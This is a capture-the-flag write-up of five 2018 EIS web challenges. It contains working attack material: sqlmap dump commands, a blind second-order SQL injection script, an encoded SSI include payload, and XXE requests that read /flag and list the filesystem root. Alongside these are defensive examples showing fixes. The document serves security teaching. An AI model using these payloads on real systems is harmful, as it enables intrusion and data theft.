2018 EIS Web writeup

Category: Programming tools · Published: 6 years ago

Summary: SimpleBBS 1. The login form throws an error

SimpleBBS

http://bbs.sec.zju.edu.cn/

Solution:

1. The login form throws an error.


2. Export the request from Burp and test it with sqlmap.

sqlmap -r bbs.txt --dbs
available databases [2]:
[*] bbs
[*] information_schema
sqlmap -r bbs.txt -D "bbs" --tables
Database: bbs
[7 tables]
+----------+
| admin    |
| articles |
| comments |
| flag     |
| messages |
| sections |
| users    |
+----------+
sqlmap -r bbs.txt -D "bbs" -T "flag" -C "f" --dump
# by the time of testing the flag was already gone....
Database: bbs
Table: flag
[1 entry]
+---------+
| f       |
+---------+
| <blank> |
+---------+

SimpleBlog

Challenge description:

SimpleBlog

http://210.32.4.20/

Solution:

At first I kept looking for a file inclusion so I could read the source; when I couldn't find one I sat down and actually worked the challenge. It turned out a plain second-order injection is enough: if the injected content exists, the score on the later quiz becomes 0.

import requests
import urllib.parse

flag = ""

register = 'http://210.32.4.20/register.php'
login = 'http://210.32.4.20/login.php'
answer = 'http://210.32.4.20/answer.php'
logout = 'http://210.32.4.20/logout.php'

# Boolean-based second-order injection: the username registered here is stored
# verbatim and later used unescaped by answer.php, so the condition inside it
# decides whether the reported grade is 0.
for i in range(3, 50):          # position of the flag character being tested
    for j in range(32, 126):    # printable ASCII candidates for that position
        print("i:", chr(i), "j", chr(j))
        req = requests.Session()
        payload = "' or if((ascii(substr((select flag from flag)," + str(i) + ",1))=" + str(j) + "),1,0)='1' or '"
        post_answer = {'1.a': 'on'}
        login_data = {'username': urllib.parse.quote(payload), 'password': 'zeroyu'}
        r = req.post(register, data=login_data)
        lin = req.post(login, data=login_data)
        ans = req.post(answer, data=post_answer)

        # When the injected condition holds, answer.php no longer reports a grade of 0
        if 'Your grades is 0' not in ans.text:
            f = chr(j)
            print(f)
            flag = flag + f
            print(flag)
            break
        lout = req.get(logout)
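Added example, not the challenge's own source (which the writeup never shows): a small sqlite3 model of the second-order injection the script above exploits, with the vulnerable grade lookup beside a parameterised fix. Table names, the placeholder flag and the sqlite-style condition (unicode() in place of MySQL's ascii()/if()) are assumptions.

```python
import sqlite3

# Constructed schema mirroring the challenge: users, per-user grades and a flag
# table. The flag value is a placeholder, not the real one.
def setup_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (username TEXT, password TEXT);
        CREATE TABLE grades (username TEXT, grade INTEGER);
        CREATE TABLE flag (flag TEXT);
        INSERT INTO grades VALUES ('alice', 100);
        INSERT INTO flag VALUES ('EIS{placeholder}');
    """)
    return db

def register(db, username, password):
    # Registration is parameterised, so a username containing quotes is stored
    # verbatim: safe here, but it is the seed of the second-order injection.
    db.execute("INSERT INTO users VALUES (?, ?)", (username, password))

def stored_username(db, username):
    row = db.execute("SELECT username FROM users WHERE username = ?", (username,)).fetchone()
    return row[0] if row else None

def grade_vulnerable(db, username):
    # The second query trusts a value that came back from the database and
    # splices it into SQL: the quotes in the stored username break out.
    user = stored_username(db, username)
    row = db.execute("SELECT grade FROM grades WHERE username = '%s'" % user).fetchone()
    return "Your grades is %d" % (row[0] if row else 0)

def grade_fixed(db, username):
    # Same logic, but the stored value is bound as a parameter, so it can only
    # ever be compared as data, whatever it contains.
    user = stored_username(db, username)
    row = db.execute("SELECT grade FROM grades WHERE username = ?", (user,)).fetchone()
    return "Your grades is %d" % (row[0] if row else 0)

def oracle_probe(grade_fn, position, codepoint):
    # sqlite analogue of the writeup's condition (assumption): true when the
    # flag character at `position` has code point `codepoint`.
    db = setup_db()
    payload = ("' or (unicode(substr((select flag from flag),%d,1))=%d) or '"
               % (position, codepoint))
    register(db, payload, "x")
    return grade_fn(db, payload)
```

Against the vulnerable lookup the payload flips the grade between 100 and 0 depending on the flag character; against the fixed one it is always 0, so the oracle disappears.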

SimpleServerInjection

Challenge description:

SimpleServerInjection, SSI, flag in current directory

http://210.32.4.22/index.php

Solution:

Knowing it was SSI, and with the hint to read the flag file, I found that with the usual payload everything after the # character was cut off, so I used encoding to get around that.


Payload

<!--%23include+virtual%3D"flag"+-->
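Added example (not from the writeup) of the defender-side lesson in the bypass above: a check that looks for the literal "<!--#" marker never sees the percent-encoded form, so request parameters must be canonicalised (decoded until stable) before they are inspected. The directive list and the decoding bound are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Directive names are the usual Apache mod_include ones (assumption about what a
# filter should cover; the writeup only uses include).
SSI_DIRECTIVE = re.compile(
    r"<!--\s*#\s*(include|exec|echo|config|set|printenv|fsize|flastmod)\b", re.I)

def naive_check(value):
    # A filter that only looks for the literal marker: %23 slips straight past it.
    return "<!--#" in value

def canonicalize(value, max_rounds=3):
    # Percent-decode until the value stops changing (bounded), so that %23 and a
    # double-encoded %2523 both collapse to '#' before inspection.
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            return value
        value = decoded
    return value

def find_ssi_directive(value):
    # Returns the directive name found after canonicalisation, or None.
    match = SSI_DIRECTIVE.search(canonicalize(value))
    return match.group(1).lower() if match else None
```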

References:

https://junookyo.blogspot.com/2012/03/shtml-bypass-view-symlink-server-side.html

https://www.secpulse.com/archives/66934.html

http://xdxd.love/2015/12/09/ssi%E6%BC%8F%E6%B4%9E%E4%BB%8B%E7%BB%8D/

SimpleExtensionExplorerInjection

Challenge description:

SimpleExtensionExplorerInjection, XXE, /flag

http://210.32.4.21:8080/www/index.html

Solution:

1. Capturing the request in Burp shows that the data is sent as JSON.

2. Change the Content-Type header to xml and try POSTing XML data.

The request and response show that an XXE vulnerability exists.

Request

POST /www/ HTTP/1.1
Host: 210.32.4.21:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://210.32.4.21:8080/www/index.html
Content-Type: application/xml; charset=UTF-8
Content-Length: 73
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<name>zzz</name>
<age>zzz</age>

Response

HTTP/1.1 500 
Content-Type: application/json;charset=UTF-8
Date: Fri, 16 Nov 2018 09:17:40 GMT
Connection: close
Content-Length: 254

{"timestamp":"2018-11-16T09:17:40.797+0000","status":500,"error":"Internal Server Error","message":"org.xml.sax.SAXParseException; lineNumber: 3; columnNumber: 2; The markup in the document following the root element must be well-formed.","path":"/www/"}

3. Following the hint /flag, read the file directly.

Request

POST /www/ HTTP/1.1
Host: 210.32.4.21:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://210.32.4.21:8080/www/index.html
Content-Type: application/xml; charset=UTF-8
Content-Length: 151
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE netspi [<!ENTITY xxe SYSTEM "file:///flag" >]>
<root>
<name>name</name>
<age>&xxe;</age>
</root>

Response:

HTTP/1.1 200 
Content-Type: text/plain;charset=UTF-8
Content-Length: 64
Date: Fri, 16 Nov 2018 09:21:23 GMT
Connection: close

Received name: name, age: EIS{bce52c116d589ae9472e59a162cc90e2}
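Added example, not the challenge's server code: the two defender-side checks this exchange calls for, a JSON endpoint that refuses to switch parsers when the client changes Content-Type, and a hardened parse for cases where XML is legitimately accepted, using Python's xml.sax with external general entities disabled. The XML body is the one from the request above; the JSON body is constructed, since the original JSON request is not shown.

```python
import io
import re
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges

# XML body copied from the writeup's request; JSON body constructed.
XXE_BODY = b'''<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE netspi [<!ENTITY xxe SYSTEM "file:///flag" >]>
<root>
<name>name</name>
<age>&xxe;</age>
</root>'''
JSON_BODY = b'{"name": "name", "age": "20"}'

DTD_MARKERS = re.compile(rb"<!DOCTYPE|<!ENTITY", re.I)

def accept_request(content_type, body, expected="application/json"):
    # Check 1: a JSON endpoint must not pick an XML parser just because the
    # client changed Content-Type; that switch is the whole attack path here.
    mime = content_type.split(";")[0].strip().lower()
    if mime != expected:
        return "reject: unexpected content type " + mime
    # Check 2: an API body has no business carrying a DTD, and SYSTEM entities
    # are what turn the parser into a file reader.
    if DTD_MARKERS.search(body):
        return "reject: DTD or entity declaration in body"
    return "accept"

class FieldCollector(ContentHandler):
    # Collects the text of each element, like the challenge's name/age echo.
    def __init__(self):
        super().__init__()
        self.fields, self._current = {}, None
    def startElement(self, name, attrs):
        self._current = name
        self.fields.setdefault(name, "")
    def characters(self, content):
        if self._current:
            self.fields[self._current] += content
    def endElement(self, name):
        self._current = None

def parse_without_external_entities(body):
    # With external general entities disabled, &xxe; expands to nothing
    # instead of the contents of /flag.
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, False)
    handler = FieldCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(body))
    return handler.fields
```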

References:

https://blog.netspi.com/playing-content-type-xxe-json-endpoints/

https://thief.one/2017/06/20/1/

SimplePrintEventLogger

Challenge description:

SimplePrintEventLogger, same server as SimpleExtensionExploreInjection , RCE, flag in /

http://210.32.4.21:8080/www/index.html

Solution:

It is on the same server as the previous challenge and the flag is in the root directory, so just browse through it by hand.

Request

POST /www/ HTTP/1.1
Host: 210.32.4.21:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://210.32.4.21:8080/www/index.html
Content-Type: application/xml; charset=UTF-8
Content-Length: 147
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE netspi [<!ENTITY xxe SYSTEM "file:///" >]>
<root>
<name>name</name>
<age>&xxe;</age>
</root>

Response

HTTP/1.1 200 
Content-Type: text/plain;charset=UTF-8
Content-Length: 169
Date: Fri, 16 Nov 2018 16:46:04 GMT
Connection: close

Received name: name, age: .dockerenv
bin
boot
dev
docker-java-home
etc
flag
flagvvvvvaaaagegsgag2333
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var

Read flagvvvvvaaaagegsgag2333

Request

POST /www/ HTTP/1.1
Host: 210.32.4.21:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://210.32.4.21:8080/www/index.html
Content-Type: application/xml; charset=UTF-8
Content-Length: 171
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE netspi [<!ENTITY xxe SYSTEM "file:///flagvvvvvaaaagegsgag2333" >]>
<root>
<name>name</name>
<age>&xxe;</age>
</root>

Response

HTTP/1.1 200 
Content-Type: text/plain;charset=UTF-8
Content-Length: 64
Date: Fri, 16 Nov 2018 16:47:38 GMT
Connection: close

Received name: name, age: EIS{f501e9c5323c560b0a40192ce9b7ad38}
